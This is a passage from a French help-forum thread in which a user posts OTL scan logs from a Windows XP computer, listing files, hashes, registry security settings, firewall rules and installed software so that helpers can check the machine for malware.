[2005/07/08 21:11:06 | 000,585,824 | ---- | C] () -- C:\WINDOWS\System32\drivers\lvcm.sys
[2005/07/08 20:46:56 | 000,000,000 | ---- | C] () -- C:\WINDOWS\OpPrintServer.INI
[2005/07/08 17:32:44 | 000,000,202 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2005/07/08 09:08:18 | 000,000,039 | ---- | C] () -- C:\WINDOWS\popcinfo.dat
[2005/07/08 08:56:13 | 000,000,169 | ---- | C] () -- C:\WINDOWS\RtlRack.ini
[2005/07/08 08:06:51 | 000,005,600 | ---- | C] () -- C:\WINDOWS\System32\stci.dll
[2005/07/08 08:02:15 | 000,000,051 | ---- | C] () -- C:\WINDOWS\iTouch.ini
[2005/07/07 22:54:24 | 000,000,156 | ---- | C] () -- C:\WINDOWS\Kpcms.ini
[2005/07/07 22:54:17 | 000,039,095 | ---- | C] () -- C:\WINDOWS\Iccsigs.dat
[2005/07/07 22:54:15 | 000,210,944 | ---- | C] () -- C:\WINDOWS\System32\MSVCRT10.DLL
[2005/07/07 22:20:51 | 000,072,192 | ---- | C] () -- C:\WINDOWS\System32\Keygen-CloneDVD.exe
[2005/07/07 21:21:16 | 000,006,550 | ---- | C] () -- C:\WINDOWS\jautoexp.dat
[2005/07/07 20:52:55 | 000,000,164 | ---- | C] () -- C:\WINDOWS\avrack.ini
[2005/07/07 20:51:26 | 000,024,064 | ---- | C] () -- C:\WINDOWS\autoload.exe
[2005/07/06 17:51:53 | 000,000,385 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2005/07/06 00:07:28 | 000,002,048 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2005/07/06 00:03:32 | 000,021,892 | ---- | C] () -- C:\WINDOWS\System32\emptyregdb.dat
[2005/07/05 23:52:51 | 000,004,207 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2005/07/05 23:52:02 | 001,701,776 | ---- | C] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2004/08/31 16:07:56 | 000,061,440 | ---- | C] () -- C:\WINDOWS\System32\sockspy(2)(2).dll
[2004/08/02 14:20:40 | 000,004,569 | ---- | C] () -- C:\WINDOWS\System32\secupd.dat
[2004/05/08 18:54:56 | 000,016,384 | ---- | C] () -- C:\WINDOWS\winpopup.exe
[2003/05/29 08:55:44 | 000,045,056 | ---- | C] () -- C:\WINDOWS\System32\Uninstall.exe
[2003/05/29 08:55:18 | 000,040,960 | ---- | C] () -- C:\WINDOWS\System32\CSUninstall.exe
[2003/04/01 10:58:02 | 000,005,260 | ---- | C] () -- C:\WINDOWS\System32\OUTLPERF.INI
[2001/09/28 14:00:00 | 013,107,200 | ---- | C] () -- C:\WINDOWS\System32\oembios.bin
[2001/09/28 14:00:00 | 000,673,088 | ---- | C] () -- C:\WINDOWS\System32\mlang.dat
[2001/09/28 14:00:00 | 000,513,094 | ---- | C] () -- C:\WINDOWS\System32\perfh00C.dat
[2001/09/28 14:00:00 | 000,444,054 | ---- | C] () -- C:\WINDOWS\System32\perfh009.dat
[2001/09/28 14:00:00 | 000,322,810 | ---- | C] () -- C:\WINDOWS\System32\perfi00C.dat
[2001/09/28 14:00:00 | 000,272,128 | ---- | C] () -- C:\WINDOWS\System32\perfi009.dat
[2001/09/28 14:00:00 | 000,218,003 | ---- | C] () -- C:\WINDOWS\System32\dssec.dat
[2001/09/28 14:00:00 | 000,086,300 | ---- | C] () -- C:\WINDOWS\System32\perfc00C.dat
[2001/09/28 14:00:00 | 000,072,312 | ---- | C] () -- C:\WINDOWS\System32\perfc009.dat
[2001/09/28 14:00:00 | 000,046,258 | ---- | C] () -- C:\WINDOWS\System32\mib.bin
[2001/09/28 14:00:00 | 000,034,108 | ---- | C] () -- C:\WINDOWS\System32\perfd00C.dat
[2001/09/28 14:00:00 | 000,028,626 | ---- | C] () -- C:\WINDOWS\System32\perfd009.dat
[2001/09/28 14:00:00 | 000,004,463 | ---- | C] () -- C:\WINDOWS\System32\oembios.dat
[2001/09/28 14:00:00 | 000,001,804 | ---- | C] () -- C:\WINDOWS\System32\dcache.bin
[2001/09/28 14:00:00 | 000,000,741 | ---- | C] () -- C:\WINDOWS\System32\noise.dat

========== LOP Check ==========

[2010/04/24 11:17:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Alwil Software
[2010/02/11 21:39:11 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Bluetooth
[2007/12/02 17:34:15 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Downloaded Installations
[2009/01/24 21:18:41 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Gestion'Hair
[2009/12/29 16:42:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Installations
[2007/09/29 20:07:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\n7-89-o9-3r-4t-r9
[2010/03/17 16:47:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\NCH Swift Sound
[2008/01/25 20:20:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Nokia
[2009/12/29 16:54:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\OviInstallerCache
[2007/12/02 18:05:03 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PC Suite
[2006/01/28 21:10:38 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Samsung
[2011/05/11 13:11:17 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/02/04 18:46:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TomTom
[2010/04/27 17:16:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Western Digital
[2009/09/06 16:59:31 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\WinZip
[2007/09/23 18:50:23 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Zylom
[2008/11/21 12:52:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
[2007/07/07 20:29:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\BitTorrent
[2008/11/12 11:42:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Blackberry Desktop
[2007/12/02 14:04:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Datalayer
[2011/05/11 10:07:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\FileZilla
[2007/09/30 13:30:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\GameHouse
[2007/12/26 18:46:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\gtk-2.0
[2007/09/29 20:16:57 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Inkscape
[2010/03/17 16:47:33 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\NCH Swift Sound
[2006/04/06 19:44:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\NGSoft
[2010/01/27 18:25:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Nokia
[2011/05/11 09:26:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Notepad++
[2008/01/03 19:54:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Opera
[2008/08/22 18:23:37 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\PC Suite
[2007/11/01 14:17:47 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\PowerChallenge
[2007/07/03 22:02:14 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\profette
[2008/08/22 17:52:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Research In Motion
[2010/02/15 18:43:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\SendBlaster2
[2010/02/04 18:45:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\TomTom
[2006/07/04 13:23:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\XnView
[2007/09/25 10:05:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim\Application Data\Zylom
[2007/11/18 17:10:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\Desperate Housewives
[2007/06/05 20:46:39 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\MPEG Streamclip
[2007/12/07 22:03:08 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Karim iPod\Application Data\PC Suite
[2011/03/28 11:18:00 | 000,000,512 | ---- | M] () -- C:\WINDOWS\Tasks\Ad-Aware Update (Weekly).job

========== Purity Check ==========
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede bea23 » 11 Mai 2011, 16:06

RAPPORT OTL (suite)

========== Custom Scans ==========


< %SYSTEMDRIVE%\*.exe >
[2007/05/29 10:09:02 | 000,930,816 | ---- | M] () -- C:\hb32.exe


< MD5 for: AGP440.SYS >
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:AGP440.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\sp3.cab:AGP440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/03 23:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\$NtServicePackUninstall$\agp440.sys
[2004/08/03 23:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\system32\ReinstallBackups\0003\DriverFiles\i386\AGP440.SYS

< MD5 for: ATAPI.SYS >
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2004/08/19 16:20:54 | 018,782,711 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2008/09/04 17:47:22 | 023,892,017 | ---- | M] () .cab file -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\sp3.cab:atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/03 22:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys
[2004/08/03 22:59:44 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\system32\ReinstallBackups\0002\DriverFiles\i386\atapi.sys

< MD5 for: CTFMON.EXE >
[2008/04/14 04:33:59 | 000,015,360 | ---- | M] (Microsoft Corporation) MD5=59DC5BB82E4C8E0B3EADCFDBC44BA6E4 -- C:\WINDOWS\ServicePackFiles\i386\ctfmon.exe
[2008/04/14 04:33:59 | 000,015,360 | ---- | M] (Microsoft Corporation) MD5=59DC5BB82E4C8E0B3EADCFDBC44BA6E4 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\ctfmon.exe
[2008/04/14 04:33:59 | 000,015,360 | ---- | M] (Microsoft Corporation) MD5=59DC5BB82E4C8E0B3EADCFDBC44BA6E4 -- C:\WINDOWS\system32\ctfmon.exe
[2004/08/19 16:09:52 | 000,015,360 | ---- | M] (Microsoft Corporation) MD5=64E41E8FEE655B03E3F19DED21BA5118 -- C:\WINDOWS\$NtServicePackUninstall$\ctfmon.exe

< MD5 for: EVENTLOG.DLL >
[2004/08/19 16:09:26 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=49B1376885340BF9EA0D99F71557B59A -- C:\WINDOWS\$NtServicePackUninstall$\eventlog.dll
[2008/04/14 04:33:24 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=4EC800BDF80521B0207BD2301DFC7D14 -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll
[2008/04/14 04:33:24 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=4EC800BDF80521B0207BD2301DFC7D14 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\eventlog.dll
[2008/04/14 04:33:24 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=4EC800BDF80521B0207BD2301DFC7D14 -- C:\WINDOWS\system32\eventlog.dll

< MD5 for: EXPLORER.EXE >
[2004/08/19 16:09:54 | 001,036,288 | ---- | M] (Microsoft Corporation) MD5=2A7BD330924252A2FD80344FC949BB72 -- C:\WINDOWS\$NtUninstallKB938828$\explorer.exe
[2007/06/13 15:10:53 | 001,037,312 | ---- | M] (Microsoft Corporation) MD5=B795475444D6D57A572C14B9E1A29839 -- C:\WINDOWS\$hf_mig$\KB938828\SP2QFE\explorer.exe
[2007/06/13 15:22:28 | 001,037,312 | ---- | M] (Microsoft Corporation) MD5=D0288319660EDCFED07C7E74C4EA38A5 -- C:\WINDOWS\$NtServicePackUninstall$\explorer.exe
[2008/04/14 04:34:03 | 001,037,824 | ---- | M] (Microsoft Corporation) MD5=F2317622D29F9FF0F88AEECD5F60F0DD -- C:\WINDOWS\explorer.exe
[2008/04/14 04:34:03 | 001,037,824 | ---- | M] (Microsoft Corporation) MD5=F2317622D29F9FF0F88AEECD5F60F0DD -- C:\WINDOWS\ServicePackFiles\i386\explorer.exe
[2008/04/14 04:34:03 | 001,037,824 | ---- | M] (Microsoft Corporation) MD5=F2317622D29F9FF0F88AEECD5F60F0DD -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\explorer.exe

< MD5 for: NETLOGON.DLL >
[2008/04/14 04:33:34 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=04821179C3171554C1BD1F9888A113E2 -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll
[2008/04/14 04:33:34 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=04821179C3171554C1BD1F9888A113E2 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\netlogon.dll
[2008/04/14 04:33:34 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=04821179C3171554C1BD1F9888A113E2 -- C:\WINDOWS\system32\netlogon.dll
[2004/08/19 16:09:38 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=D4CFAC76926C24E32B7F25A35C31BC6E -- C:\WINDOWS\$NtServicePackUninstall$\netlogon.dll

< MD5 for: SCECLI.DLL >
[2004/08/19 16:09:40 | 000,186,368 | ---- | M] (Microsoft Corporation) MD5=58D439F6EF73A2D9288B204E819F4BBD -- C:\WINDOWS\$NtServicePackUninstall$\scecli.dll
[2008/04/14 04:33:40 | 000,187,392 | ---- | M] (Microsoft Corporation) MD5=973B36634C544948C663E8269AA1B3A3 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll
[2008/04/14 04:33:40 | 000,187,392 | ---- | M] (Microsoft Corporation) MD5=973B36634C544948C663E8269AA1B3A3 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\scecli.dll
[2008/04/14 04:33:40 | 000,187,392 | ---- | M] (Microsoft Corporation) MD5=973B36634C544948C663E8269AA1B3A3 -- C:\WINDOWS\system32\scecli.dll

< MD5 for: USERINIT.EXE >
[2004/08/19 16:10:04 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=84717891F0734C611721F56C60B5FBC3 -- C:\WINDOWS\$NtServicePackUninstall$\userinit.exe
[2008/04/14 04:34:26 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=E74DDB12188C2FF57A78624DBF7332FC -- C:\WINDOWS\ServicePackFiles\i386\userinit.exe
[2008/04/14 04:34:26 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=E74DDB12188C2FF57A78624DBF7332FC -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\userinit.exe
[2008/04/14 04:34:26 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=E74DDB12188C2FF57A78624DBF7332FC -- C:\WINDOWS\system32\userinit.exe

< MD5 for: WINLOGON.EXE >
[2004/08/19 16:10:06 | 000,506,368 | ---- | M] (Microsoft Corporation) MD5=123EEA158F74D0F67A51DCDF065D1091 -- C:\WINDOWS\$NtServicePackUninstall$\winlogon.exe
[2008/04/14 04:34:28 | 000,512,000 | ---- | M] (Microsoft Corporation) MD5=DD73D6B9F6B4CB630CF35B438B540174 -- C:\WINDOWS\ServicePackFiles\i386\winlogon.exe
[2008/04/14 04:34:28 | 000,512,000 | ---- | M] (Microsoft Corporation) MD5=DD73D6B9F6B4CB630CF35B438B540174 -- C:\WINDOWS\SoftwareDistribution\Download\23ec66f2314a80d718b5483ab6e865af\winlogon.exe
[2008/04/14 04:34:28 | 000,512,000 | ---- | M] (Microsoft Corporation) MD5=DD73D6B9F6B4CB630CF35B438B540174 -- C:\WINDOWS\system32\winlogon.exe

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >
[2008/04/14 04:33:24 | 000,380,445 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\expsrv.dll
[2001/09/28 14:00:00 | 001,355,776 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\Msvbvm50.dll
[2008/04/14 04:33:33 | 001,384,479 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\WINDOWS\system32\msvbvm60.dll
[6 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

< %systemroot%\Tasks\*.job /lockedfiles >

========== Alternate Data Streams ==========

@Alternate Data Stream - 88 bytes -> C:\Documents and Settings\Karim\Application Data\Microsoft\Internet Explorer\Quick Launch\Bureau.scf:SummaryInformation
@Alternate Data Stream - 203 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:618D0840
@Alternate Data Stream - 147 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:75A3C24B
@Alternate Data Stream - 135 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:BEC0D766
@Alternate Data Stream - 129 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:E44DF565

< End of report >
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede bea23 » 11 Mai 2011, 16:07

RAPPORT EXTRAS (OTL):

OTL Extras logfile created on: 11/05/2011 13:40:52 - Run 1
OTL by OldTimer - Version 3.2.22.3 Folder = C:\Documents and Settings\Karim\Bureau
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 0000080C | Country: Belgique | Language: FRB | Date Format: d/MM/yyyy

1.023,00 Mb Total Physical Memory | 506,00 Mb Available Physical Memory | 49,00% Memory free
2,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 127,99 Gb Total Space | 64,78 Gb Free Space | 50,62% Space Free | Partition Type: NTFS
Drive E: | 3,83 Gb Total Space | 2,44 Gb Free Space | 63,74% Space Free | Partition Type: FAT32
Drive F: | 3,87 Gb Total Space | 3,83 Gb Free Space | 98,78% Space Free | Partition Type: FAT32
Drive G: | 1,86 Gb Total Space | 0,68 Gb Free Space | 36,61% Space Free | Partition Type: FAT

Computer Name: KARIM-PBDRK3C5J | User Name: Karim | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.js [@ = JSFile] -- Reg Error: Value error. File not found

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
jsfile [open] -- Reg Error: Value error.
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [ACDBrowse] -- C:\Program Files\ACDSee32\ACDSee32.exe "%1" (ACD Systems, Ltd.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 1
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 1
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008
"139:TCP" = 139:TCP:LocalSubNet:Disabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Disabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Disabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Disabled:@xpsp2res.dll,-22002

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\eMule\emule.exe" = C:\Program Files\eMule\emule.exe:*:Enabled:eMule
"C:\Program Files\Yahoo!\Messenger\YPager.exe" = C:\Program Files\Yahoo!\Messenger\YPager.exe:*:Enabled:Yahoo! Messenger
"C:\Program Files\Yahoo!\Messenger\YServer.exe" = C:\Program Files\Yahoo!\Messenger\YServer.exe:*:Enabled:Yahoo! FT Server
"C:\Program Files\Wilcom2\Ken Messenger\Wvoip.exe" = C:\Program Files\Wilcom2\Ken Messenger\Wvoip.exe:*:Enabled:Wvoip
"C:\Program Files\Wilcom2\Ken Messenger\Ken Messenger.exe" = C:\Program Files\Wilcom2\Ken Messenger\Ken Messenger.exe:*:Enabled:Instant Messanger Client
"C:\Program Files\SimpleComm\ngssc.exe" = C:\Program Files\SimpleComm\ngssc.exe:*:Enabled:ngssc
"C:\Program Files\BitTorrent\bittorrent.exe" = C:\Program Files\BitTorrent\bittorrent.exe:*:Enabled:BitTorrent
"C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe" = C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe:*:Enabled:BlueSoleil
"C:\Program Files\iTunes2\iTunes.exe" = C:\Program Files\iTunes2\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{036AA4D4-6D32-11D4-9875-00105ACE7734}" = Logiciel iTouch de Logitech
"{04AF207D-9A77-465A-8B76-991F6AB66245}" = Adobe Help Viewer CS3
"{08B32819-6EEF-4057-AEDA-5AB681A36A23}" = Adobe Bridge Start Meeting
"{0C826C5B-B131-423A-A229-C71B3CACCD6A}" = CDDRV_Installer
"{121634B0-2F4B-11D3-ADA3-00C04F52DD52}" = Windows Installer Clean Up
"{16976C6C-F8D5-4317-9DE8-1F6352B66725}" = RAW Image Task
"{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}" = Adobe WinSoft Linguistics Plugin
"{1888DAFD-C634-4BC4-865C-3455E24F6177}" =
"{1A59064A-12A9-469F-99F6-04BF118DBCFF}" = Kaspersky PURE
